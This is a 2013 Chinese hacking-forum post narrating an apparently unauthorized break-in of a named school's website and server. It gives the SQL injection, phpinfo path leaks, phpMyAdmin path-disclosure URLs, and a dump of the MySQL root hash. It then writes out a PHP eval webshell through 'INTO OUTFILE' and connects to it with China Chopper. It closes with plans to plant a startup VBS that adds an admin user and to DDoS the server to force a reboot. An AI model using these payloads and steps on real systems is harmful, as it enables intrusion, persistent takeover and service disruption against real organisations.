找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2683|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
$ E- W% `' D; |) z发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!/ ?: }6 p* r2 a( \) u
. z& y: ^9 ?4 {$ R+ A% C* t% j

7 K: v7 K2 w3 J( ?' d/ M6 p* D; C0 n, a
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
' G3 O# G# \7 {, C% Y+ k+ B7 M5 T% _2 Z! L
那么想可以直接写入shell ,getshell有几个条件:; I9 X- B7 o; A- P$ y0 R& |
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF: h; w+ Q4 z% Y8 {

2 z4 B* X7 t  O试着爆绝对路径:
, m0 u% D* x2 b1./phpMyAdmin/index.php?lang[]=1  . o0 z0 i% w) M. z
2./phpMyAdmin/phpinfo.php  
) q: B! c/ d/ _' [3./load_file()  
/ x8 y) A4 @4 ~. ~# [4 N4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
8 U# G5 s% b& E' s9 T$ @5 B5./phpmyadmin/libraries/select_lang.lib.php  
- m) h8 J- Z1 Y# P2 a8 t+ g6./phpmyadmin/libraries/lect_lang.lib.php  
7 @4 J4 ~9 ?1 r% ~: Y+ g7./phpmyadmin/libraries/mcrypt.lib.php   
: [8 Z9 C- }3 O1 h5 _# D, K8./phpmyadmin/libraries/export/xls.php  
, r" L& x# ?9 Y+ J. e' M3 H9 d, W5 l# h( f
均不行...........................; O3 f* }+ T$ p% I! Q) Q- ~: l

' C- U, H$ B: y" J: G: \御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
- Y) X1 D' L4 w. N" {
  _/ I7 t: s  ]. L& ?3 S0 d* F权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin $ K4 m5 p$ W2 Z: n# n: k

; U, C9 [$ y" G默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
( P9 p8 e* C" S/ |) G! ]# J: V1 [% ^. J0 j% @! x, n' Q, B  ^
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........8 H' }6 F$ J; ]9 E% g. a$ o. O' I0 }

" ^. e7 n8 ~& A6 y+ ?5 E) ?3 q想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
4 |4 y9 h  F% c5 a) q3 D2 B& r- ]& |2 ~* I; X; O
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini " E6 Q$ A+ [7 M# K' b8 ^

* W4 ?0 O' p! E0 m1 B自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ( \9 r6 p- `5 M, ]
/ S, X$ B8 Y, l
成功读到root密码:
/ B" I  N" {7 x! {+ h* q7 r8 @: m& r  ?+ ~0 y
17---- r(0072)
' O% r. n/ i" M: l) v" r18---- o(006f)
( B5 J' F) R" a) T0 |19---- o(006f)5 [# G2 \- `' F* p+ [% J$ [
20---- t(0074)
+ [  o3 {# c. o/ X  E% i21---- *(002a)+ n4 C. F& b; `; ?; F6 a, M
22---- 8(0038)7 c' s1 l6 p/ N5 V/ t, Q) \& w
23---- 2(0032)
0 a( o" C  t  H! N7 W24---- E(0045)" U: _- m6 _* @$ M
25---- 1(0031)3 J% ]  M7 K9 N% F
26---- C(0043)& \8 U$ M: U+ `0 N. t
27---- 5(0035)3 J& j" C9 V% s) u7 K& J5 e# g
28---- 8(0038); U0 n5 E7 m- V  c
29---- 2(0032)
: p5 H/ L8 i; t" V' k7 z30---- 8(0038)) u' ]) Z9 V3 }# d. V6 q/ m: \
31---- A(0041)
9 q4 `, q1 r' O% R32---- 9(0039)
2 J9 D( z* u* t; V/ s33---- B(0042)8 g8 h/ Q2 }. W" Y5 ?% X% H
34---- 5(0035)8 @0 e+ o8 w$ G' b. X
35---- 4(0034)
* T9 k7 }' h! i. j! N$ ^36---- 8(0038)8 Z) c9 W  j% x) g
37---- 6(0036)3 ?/ f1 `% V) `' L$ C, j8 a
38---- 4(0034)
+ t! [5 }; V9 W' R( _$ m39---- 9(0039)
6 g2 W5 V3 t$ J* {: `40---- 1(0031)* R1 B) C  [( h+ _; j
41---- 1(0031)
5 {& a9 Y" e) m1 N5 c% E  s% U42---- 5(0035)
( B: x0 C# Z. t; {43---- 3(0033), v# D/ ]7 {; p- _" m0 P
44---- 5(0035)
: E8 r1 R+ U( z' y4 ~/ I( V. n45---- 9(0039)8 Q4 ]2 g, h  N3 G3 {
46---- 8(0038)
3 n* I  f- ?3 k47---- F(0046)) K/ l  M: G+ T; Z
48---- F(0046)$ @0 h0 V8 s1 p8 b
49---- 4(0034)- c- e) S+ ]: ~  z4 A( r+ @+ q
50---- F(0046)1 Y" h3 V+ v0 ^  u) O4 ^# v5 K
51---- 0(0030); Z$ P, D- Q* Z' f2 A* I. L3 N& P
52---- 3(0033)
4 r0 G. ]" d0 \8 g/ M) p8 p1 {53---- 2(0032)/ u  u) u: [1 }
54---- A(0041)4 l8 T/ D$ O+ ]
55---- 4(0034)
; {5 z5 U4 ^  c. Z* e6 t56---- A(0041)! q  J  _6 r1 c4 A
57---- B(0042)7 V/ C* X. n7 @9 C4 S& L. S
58---- *(0044)
" N. G. `: m5 p* x, B/ s1 ^59---- *(0035)" a3 {' X  D) \4 @
60---- *(0041)
; T1 f# ?: h# w0 y7 L. q' A61---- *0032)
5 c3 K( ~- W6 F+ q" S  |0 k) K4 ~: n% b
解密后成功登陆phpmyamin% r# h8 ~8 }, D6 u, t& ~
                          2 t. y  J) A/ `: u& |

( {/ i+ X* y2 {                             , C! ], U' E$ a3 z$ m5 Z7 j5 o, ~
& h% H& j0 S  ~4 N
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
" m/ [+ d! r4 J' Y' ~! q. ~0 w
成功执行,拿下shell,菜刀连接:- I- a  C- I' Y

/ u# d" i9 O* _6 {* V/ M服务器不支持asp,aspx,php提权无果...................
7 [7 [8 v9 L. ~, H, Z  r% x8 J7 I- b) W4 d5 o4 j9 H2 w4 M9 q
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
" V9 r) |  `+ `6 a
服务器上已经有个隐藏帐号了
+ ~% I  I! k5 l$ D7 b$ |: U+ N3 D
别名     administrators6 S; |' {5 G; j1 D1 x$ w% b: J
注释     管理员对计算机/域有不受限制的完全访问权
" h* Q& H: T' o" L7 a; {0 T
成员

3 u0 N# s  i& V* r8 G( r  L* x/ c
-------------------------------------------------------------------------------
$ j6 F8 Q8 ?( r! F$ l- Tadmin: ]# _7 ^  \2 ~
Administrator8 p7 z" s: M6 [9 n2 M
slipper$: s- L/ r1 D  e) L: `7 H
sqluser0 L9 A# g5 M: Q1 X: i% A: `! s
命令成功完成。   @. s7 Z' H+ a8 P( j  w& n

# V7 l, r! p8 Z4 P& V! c5 v8 u服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
' F. S) P8 W( C  B2 J( X5 W: P! }8 G3 b6 l( I
ddos服务器重启,不然就只能坐等服务器重启了...............................
* r6 f* U# J" B; ]( h6 H5 m; m' ]
      

$ B; S6 [$ ?! R: Y  D7 {

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表